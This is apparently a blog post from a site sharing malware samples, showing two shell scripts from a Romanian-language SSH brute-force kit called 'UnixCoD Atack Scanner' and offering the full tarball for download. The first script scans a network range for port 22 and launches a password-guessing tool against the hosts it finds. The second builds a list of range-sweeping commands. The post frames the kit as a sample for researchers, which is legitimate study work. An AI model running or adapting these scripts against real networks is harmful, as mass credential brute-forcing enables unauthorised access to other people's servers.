Disclaimer: Any files on this site that are distributed are shared with the understanding that these files are malicious and are intended for use by security researchers. The owner of this site is in no way responsible, liable or accountable for the use of the files from this site.
So I have another script for you guys. This one I can't seem to figure out how it was suppose to be used. Every time I try to test with it, I get errors. It is an SSH scanner that tests for easy to guess usernames and passwords. Which can used for security-auditing. This one was a tarball with a couple files in it but I will show the main scripts below and provide a download to the tarball below.
#!/bin/bash if [ $# != 1 ]; then echo "[+] Folosim : $0 [b class]" exit; fi echo "[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]" echo "[+] SSH Brute force scanner : user & password [+]" echo "[+] Undernet Channel : #UnixCoD [+]" echo "[+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+]" ./find $1 22 sleep 10 cat $1.find.22 |sort |uniq > ip.conf oopsnr2=`grep -c . ip.conf` echo "[+] Incepe partea cea mai misto :D" echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !" echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]" echo "[+] Incepem sa vedem cate server putem sparge" ./atack 100 rm -rf $1.find.22 ip.conf echo "[+] UnixCoD Scanner a terminat de scanat !"
#!/bin/sh echo echo "Enter A class range" read brange echo "Enter output file" read file crange=0 while [ $crange -lt 255 ] ; do echo -n "./assh $brange.$crange ; " >> $file let crange=crange+1 done